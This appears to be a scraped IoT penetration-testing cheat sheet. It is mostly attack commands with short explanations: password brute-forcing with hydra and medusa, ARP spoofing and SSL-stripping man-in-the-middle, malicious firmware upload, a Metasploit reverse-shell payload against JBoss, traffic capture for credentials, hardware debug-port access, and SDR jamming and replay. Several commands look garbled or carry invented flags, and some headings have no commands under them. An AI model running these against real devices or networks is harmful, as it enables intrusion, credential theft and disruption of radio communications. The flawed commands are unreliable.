Comment on page
To scan all open ports and services running on them
nmap -Pn -sS -sV <target IP> -p 1-65535
To enumerate directories and files on the web server.
dirb http://<target IP>:<port>/
To enumerate SNMP service.
snmpwalk -c public -v1 <target IP>
Use curl to send HTTP requests:
curl -X GET http://target.com/
curl -X POST -d "data=example" http://target.com/
Use wget to download files:
Use Nikto for web server scanning:
nikto -h target.com
Use Mosquitto to publish and subscribe to topics:
mosquitto_sub -t topic -h broker_address -p port -u username -P password
mosquitto_pub -t topic -h broker_address -p port -m "message" -u username -P password
Use MQTTInspector to capture and analyze MQTT traffic:
Use CoAPthon3 for sending CoAP requests:
python3 coapclient.py -m get -u coap://target.com/resource
Use Wireshark to capture and analyze CoAP traffic:
Use KillerBee to sniff and inject Zigbee traffic:
sudo python3 -m pip install pyusb
sudo apt-get install libpcap-dev
sudo python3 -m pip install pyserial
sudo python3 -m pip install pycrypto
sudo python3 -m pip install killerbee
Use Wireshark to capture and analyze Zigbee traffic:
Use BlueZ to scan and connect to BLE devices:
sudo hcitool lescan
sudo hcitool lecc <mac_address>
Use GATTacker to fuzz BLE services:
Use Wireshark to capture and analyze BLE traffic:
hydra -L usernames.txt -P passwords.txt ssh://192.168.0.1
medusa -u admin -P /usr/share/wordlists/rockyou.txt -h 192.168.0.1 -M ssh
hydra -L userlist.txt -P passlist.txt -e ns -t 16 telnet://target_IP
This command instructs Bettercap to start intercepting traffic between two devices with IP addresses 192.168.0.10 and 192.168.0.20, and to perform a TCP proxy for HTTP and HTTPS traffic. The -X option enables SSL stripping, which downgrades HTTPS connections to HTTP, making the traffic vulnerable to interception and manipulation.
sudo bettercap --proxy --sniffer -T 192.168.0.10,192.168.0.20 -X --tcp-proxy
Exploiting Unauthenticated Firmware Updates:
curl -F "file=@malicious_firmware.bin" http://target_device/update
arpspoof -i eth0 -t target_device_ip gateway_ip
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
mitmproxy -p 8080 -T --anticache -s "replace.py malicious_firmware.bin"
Fuzzing the Update Mechanism:
python3 firmware_fuzzer.py target_device_ip
This command uses the “http_jboss_jmx_invoke” module in Metasploit to scan for a vulnerable JBoss server running on port 8080 of the target device. If the vulnerability is found, the “java/jsp_shell_reverse_tcp” payload is used to establish a reverse shell connection back to the attacker’s machine.
set RHOSTS <target IP>
set RPORT 8080
set PAYLOAD java/jsp_shell_reverse_tcp
set LHOST <attacker IP>
set LPORT <attacker port>
This command captures all network traffic on the device’s wireless interface (wlan0) and saves it to a file called capture.pcap. The attacker can then use Wireshark or another network analysis tool to examine the captured traffic for sensitive information, such as login credentials or personal data.
sudo tcpdump -i wlan0 -s 0 -w capture.pcap
This command launches BetterCAP on the device’s wireless interface (wlan0) and enables the proxy module, which allows the attacker to intercept and modify network traffic in real-time. The attacker can then use this to capture sensitive information or inject malicious payloads into the network traffic.
sudo bettercap -I wlan0 --proxy
In this command, mitmproxy is a popular tool for performing MITM attacks. The –host option tells mitmproxy to intercept traffic to and from the target device, and the -R option specifies the URL of the device’s API endpoint. The –ssl-insecure option disables SSL certificate verification, allowing the attacker to intercept encrypted traffic.
The -s option specifies a custom script, extract_sensitive_data.py, that extracts sensitive data from intercepted traffic. This script could use regular expressions or other techniques to search for and extract sensitive data from intercepted requests and responses.
mitmproxy -T --host -R https://target_device.com/ --ssl-insecure -s extract_sensitive_data.py
hydra -l admin -P password_list.txt 192.168.1.1 http-post-form "/login.html:user=admin&password=^PASS^:Incorrect password"
strings -n5 <bin>
strings -n16 <bin>#longer than 16
strings -tx <bin> #print offsets in hex
hexdump -C -n 512 <bin> > hexdump.out
hexdump -C <bin> | head # might find signatures in header
fdisk -lu <bin> #lists a drives partition and filesystems if multiple
If the binary may be encrypted, check the entropy using binwalk with the following command:
binwalk -E <bin>
Use the following tools and methods to extract filesystem contents:
$ binwalk -ev <bin>
Firmware Analysis Comparison Toolkit (FACT )
EmbedOS - Embedded security testing operating system based on Ubuntu 18.04 preloaded with firmware security testing tools. The virtual machine can be downloaded and imported as an OVF file into VirtualBox or VMWare. https://github.com/scriptingxss/EmbedOS
EMBA - Embedded Analyzer
sudo ./emba.sh -f ~/IoTGoat-x86.img.gz -l ~/emba_logs_iotgoat -p ./scan-profiles/default-scan.emba
firmware analysis toolkit
sudo python3 ./fat.py IoTGoat-rpi-2.img --qemu 2.5.0
UART is often used for debugging and maintenance purposes on IoT devices, but it can also be used to gain access to the device and execute malicious code.
screen /dev/ttyUSB0 115200 (connect to UART interface with baud rate of 115200)
cu -l /dev/ttyUSB0 -s 115200 (connect to UART interface with baud rate of 115200)
1.Identify UART pins on the device 2.Connect to UART using a USB-to-UART adapter 3.Identify the baud rate and data format 4.Access the device console and execute commands 5.Use reverse engineering techniques to analyze firmware and identify vulnerabilities
JTAG is a hardware interface used for testing and debugging integrated circuits. It can also be used to gain access to the firmware and execute malicious code.
OpenOCD -f interface/<interface> -f target/<target> (start OpenOCD using interface and target configuration files)
1.Identify JTAG pins on the device 2.Connect to JTAG using a JTAG adapter and OpenOCD software 3.Identify the JTAG chain and select the target device 4.Read and write memory, execute code, and debug firmware using gdb
SWD is a newer, smaller and faster version of JTAG that is often used in ARM-based IoT devices. It can also be used to gain access to the firmware and execute malicious code.
OpenOCD -f interface/<interface> -c "transport select swd" -f target/<target> (start OpenOCD using interface and target configuration files)
1.Identify SWD pins on the device 2.Connect to SWD using a SWD adapter and OpenOCD software 3.Identify the SWD chain and select the target device 4.Read and write memory, execute code, and debug firmware using gdb
1.Determine the SPI configuration (clock, polarity, phase) of the target device using a logic analyzer or oscilloscope.
2.Use a bus pirate or similar tool to sniff SPI traffic between the target device and other devices on the bus.
3.Use a tool like spi-tools or spidev to interact with the SPI bus and send custom commands to the target device.
4.Look for unauthenticated or easily guessable commands that can be sent over the SPI bus to modify device behavior or extract sensitive information.
5.Use fault injection attacks (such as glitching or power analysis) to induce errors in the target device and extract secrets.
1.Determine the I2C address of the target device using a logic analyzer or oscilloscope. Use a tool like i2cdetect or i2c-tools to interact with the I2C bus and send custom commands to the target device.
2.Look for unauthenticated or easily guessable commands that can be sent over the I2C bus to modify device behavior or extract sensitive information.
3.Use a tool like Bus Pirate or Shikra to sniff I2C traffic between the target device and other devices on the bus.
4.Use a software-defined radio (SDR) to perform electromagnetic (EM) side-channel attacks and extract secrets.
Sniffing: Use a software-defined radio (SDR) to capture and analyze radio signals. Popular tools for this include GNU Radio, URH, and Inspectrum.
sudo apt-get install gnuradio urh
Jamming: Jamming is a denial-of-service attack that sends a high-power signal to interfere with the target device’s radio signal. The most common tool for jamming is the HackRF One.
sudo apt-get install hackrf
Replay attack: This involves capturing a valid signal and replaying it later to mimic a legitimate device.
Use GNU Radio to capture and replay the signal. Alternatively, use specialized tools like rtl_433 or Universal Radio Hacker (URH).
Packet injection: This involves injecting packets into the radio signal to execute an attack. For this, tools like KillerBee and Scapy can be used.
sudo apt-get install killerbee scapy
Directional antenna: A directional antenna can be used to target a specific device or area, making it easier to intercept or jam the signal.
Buy or rent a directional antenna from a reputable vendor.
Frequency hopping: Some IoT devices use frequency hopping to avoid interference. However, this can be exploited by capturing and analyzing the hopping patterns to predict where the device will be next.
Use tools like GQRX or Inspectrum to analyze frequency hopping patterns.
Sniffing and Decoding: Sniffing and decoding the LPWAN communication using software-defined radios (SDRs) and tools such as:
- Universal Radio Hacker (URH)
- HackRF One
To start sniffing with HackRF One:
hackrf_transfer -r filename.bin -f frequency -s sample_rate -g gain
To decode captured signals with URH:
urh --input-file filename.bin --modulation lora --rate [bandwidth] --frequency [frequency]
Replay Attacks: Record and replay the captured packets to trigger events on the IoT device or network.
To transmit the recorded signals with HackRF One:
hackrf_transfer -t filename.bin -f frequency -s sample_rate -a 1 -x 40
To inject signals into the network with URH:
urh --input-file filename.bin --modulation lora --rate [bandwidth] --frequency [frequency] --tx
Jamming Attacks: Generate noise on the LPWAN frequency to disrupt the communication between the IoT device and network.
To transmit noise with HackRF One:
hackrf_transfer -t noise.bin -f frequency -s sample_rate -a 1 -x 40
To generate random signals with URH:
urh --modulation lora --rate [bandwidth] --frequency [frequency] --tx --duration [time_in_seconds] --random-data
Interference Attacks: Generate signals on nearby frequencies to cause interference and affect the quality of the LPWAN communication.
To transmit signals on a nearby frequency with HackRF One:
hackrf_transfer -t filename.bin -f [nearby_frequency] -s sample_rate -a 1 -x 40
To generate signals on multiple frequencies with URH:
urh --modulation lora --rate [bandwidth] --frequency-range [start_frequency] [end_frequency] --tx --duration [time_in_seconds] --random-data